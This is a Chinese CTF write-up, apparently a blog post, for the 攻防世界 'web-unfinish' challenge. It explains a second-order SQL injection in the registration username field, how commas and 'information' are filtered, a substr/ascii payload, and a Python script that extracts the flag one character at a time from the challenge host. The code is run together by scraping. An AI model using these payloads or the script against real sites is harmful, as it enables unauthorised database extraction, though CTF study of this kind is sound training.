当前位置: 首页 > news >正文

[CTF]攻防世界:web-unfinish(sql二次注入)

题目:web-unfinish(sql二次注入)

二次注入

打开页面是一个登录页面


步骤

  1. 扫描一下目录:


有登录有注册


  1. 先测试登录是否存在sql,测试了一下发现似乎不存在。

  1. 继续测试注册,先正常注册一个用户,登录看看。

    登录成功,能看到用户名。

  1. 试试再注册的时候,给用户名位置写上注入测试:0’+1+'0,登录后发现用户名变为1.

使用Burp Suite Fuzz 了一下,当用户名中有 information 或 , 时,会提示 nonono!!!


  1. 只能猜表名为flag.
    通过payload依次读取flag值:0'+ascii(substr(select * from flag) from 1 for 1)+'0

  1. 写个脚本,自动读出flag。

流程为:注册-》登录-》获取用户名值(ascii)

importrequestsimportreimporttime url="http://61.147.171.105:54224/"MAX_RETRIES_PER_POS=5# 重试 defget_flag():flag=""i=1# 从位置1开始whilei<50:email=f"user{i}@qq.com"username_payload=f"0'+ascii(SUBSTR((select * from flag) FROM {i} FOR 1))+'0"password="123"retry_count=0success=Falsewhileretry_count<=MAX_RETRIES_PER_POS:ifretry_count>0:print(f"[!] 尝试位置 {i} (尝试 {retry_count + 1})...")time.sleep(2)# 稍等再试try:print(f"[+] 尝试位置 {i}: {username_payload}")# 注册 r_reg=requests.post(url+"register.php",data={'email':email,'username':username_payload,'password':password},allow_redirects=False,timeout=10)ifr_reg.status_code!=302:# 可能是 SQL 错误或 flag 已结束(非网络问题)print(f"[-] 注册失败 {r_reg.status_code} 再位置 {i}. 结束.")success=True # 视为“正常结束”,跳出break# 登录 r_login=requests.post(url+"login.php",data={'email':email,'password':password},timeout=10)# 提取 ASCII match=re.search(r'<span class="user-name">\s*(\d+)\s*</span>',r_login.text)ifmatch:ascii_val=int(match.group(1))ifascii_val==0:print("[*] 结尾 (ASCII 0).")success=Truebreakchar=chr(ascii_val)flag+=charprint(f"[+] 位置 {i}: ASCII={ascii_val} => '{char}' | Flag : {flag}")success=Truebreakelse:print(f"[-] 找不到flag {i} :\n{r_login.text[:200]}")success=True # 无法提取,视为结束breakexcept(requests.exceptions.Timeout,requests.exceptions.ConnectionError)ase:retry_count+=1print(f"[-] 网络问题 position {i} (attempt {retry_count}): {e}")ifretry_count>MAX_RETRIES_PER_POS:print(f"[!] 超过最大重试 position {i}. 退出.")print("\n[!] flag (部分):",flag)returncontinue# 重试当前 i except Exceptionase:print(f"[-] 异常 position {i}: {e}")success=True # 非网络异常,不重试breakifnot success:print(f"[!] 错误 position {i} .")breakifsuccess and(r_reg.status_code!=302or(locals().get('match')andint(locals().get('match').group(1))==0)or notlocals().get('match')):breaki+=1# 成功获取一位,继续下一位 time.sleep(3)print("\n[!] flag:",flag)if__name__=='__main__':get_flag()


有疑问可留言解答…

http://www.cnnetsun.cn/news/38158.html

相关文章:

  • shell脚本发邮件
  • 关系型数据库和非关系型数据库的区别
  • 网络安全中对称算法和非对称算法的作用和区别
  • Whisper-Tiny.en:5大商业场景揭秘2025智能语音市场新格局
  • 当工控老炮儿遇上上位机:手把手教你驯服大地控制器
  • 18. 有理函数和渐近线
  • 树莓派家庭服务器搭建指南从零到实用
  • 黑客大神都会玩这 10 个 Linux 命令,我不允许你还不知道!
  • Wi-Fi CERTIFIED Data Elements™ 技术概述
  • CTF — 压缩包密码爆破(非常详细),零基础入门到精通,看这一篇就够了
  • 基于YOLO的小目标检测增强:一种提升精度与效率的新框架
  • stm32编码总结
  • 轻量级AI模型高并发应用实战:5大核心技巧深度解析
  • 2025土壤墒情监测设备选型全攻略:金叶智能应用分享
  • 掌握波利亚解题法:提升问题解决能力的终极指南
  • 2025校园气象站建设干货曝光:金叶智能科教应用实例
  • SQL Server终极学习指南:7天从零到实战精通
  • 揭秘IOCCC获奖代码库:隐藏在混乱中的编程艺术殿堂
  • Java开发被裁员,以后能干点啥不。
  • 9种常见的前端跨域解决方案(详解)零基础入门到精通,收藏这篇就够了
  • 2025前端vscode必备插件(持续更新)零基础入门到精通,收藏这篇就够了
  • OVITO终极指南:5步掌握分子动力学可视化分析
  • Reddit短视频自动化创作技术解析与实战应用
  • 基于SpringBoot+Vue技术的医疗器械管理系统设计与实现(毕业设计项目源码+文档)
  • 1、Red Hat Linux 性能调优与安全保障指南
  • 基于Python+Django的社区服务管理系统源码设计与文档
  • 电子信息毕设 stm32 RFID员工打卡门禁系统(源码+硬件+论文)
  • Go后端工程师
  • Rust二进制大小优化终极指南:从新手到专家的完整解决方案
  • F2批量重命名的7个安全技巧:从新手到高手的防护指南